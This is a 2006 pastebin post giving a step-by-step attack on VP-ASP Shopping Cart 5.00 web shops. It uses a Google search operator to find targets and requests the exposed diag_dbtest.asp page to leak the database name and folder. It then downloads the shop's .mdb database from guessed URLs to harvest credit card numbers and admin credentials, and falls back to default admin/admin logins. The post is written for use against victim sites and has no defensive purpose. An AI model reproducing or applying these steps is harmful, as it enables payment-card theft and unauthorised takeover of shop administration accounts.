Part of Slepp's ProjectsPastebinTURLImagebinFilebin
Feedback -- English French German Japanese
Create Upload Newest Tools Donate
Sign In | Create Account

Advertising

Untitled
2006 year 10 month 12 day Thursday 05:52:26 MDT 

  1. Go to google.com
  2.  and type.
  3.  intitle: VP-ASP Shopping Cart 5.00
  4.  You will find many websites with VP-ASP 5.00 cart software installed
  5.  Now let's go to the exploit..
  6.  the page will be like this > ****://***.victim.com/shop/shopdisplaycategories.asp
  7.  The exploit is : diag_dbtest.asp
  8.  so do this>
  9.  ****://***.victim.com/shop/diag_dbtest.asp
  10.  A page will appear contain those:
  11.  xDatabase
  12.  shopping140
  13.  xDblocation
  14.  resx
  15.  xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSystemxEmailTypex
  16.  xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSystemxEmailTypexOrdernumber.:. EXAMPLE .:.
  17.  the most important thing here is xDatabase
  18.  xDatabase: shopping140
  19.  ok now the URL will be like this:
  20.  ****://***.victim.com/shop/shopping140.mdb
  21.  continue 04/02/2005 22:53
  22.  if you didn't download the Database..
  23.  Try this while there is dblocation.
  24.  xDblocation
  25.  resx
  26.  the url will be:
  27.  ****://***.victim.com/shop/resx/shopping140.mdb
  28.  If u see the error message you have to try this :
  29.  ****://***.victim.com/shop/shopping500.mdb
  30.  download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at
  31.  download.com Or use MS Office Access.
  32.  inside you should be able to find credit card information.
  33.  and you should even be able to find the admin username and password for the website.
  34.  the admin login page is usually located here
  35.  ****://***.victim.com/shop/shopadmin.asp
  36.  if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb
  37.  file at all then try to find the admin login page and enter the default passwords which are
  38.  Username: admin
  39.  password: admin

advertising

Update the Post

Either update this post and resubmit it with changes, or make a new post.

You may also comment on this post.

update paste below
details of the post (optional)

Note: Only the paste content is required, though the following information can be useful to others.

Save name / title?

(space separated, optional)



Please note that information posted here will expire by default in one month. If you do not want it to expire, please set the expiry time above. If it is set to expire, web search engines will not be allowed to index it prior to it expiring. Items that are not marked to expire will be indexable by search engines. Be careful with your passwords. All illegal activities will be reported and any information will be handed over to the authorities, so be good.

comments powered by Disqus
worth-right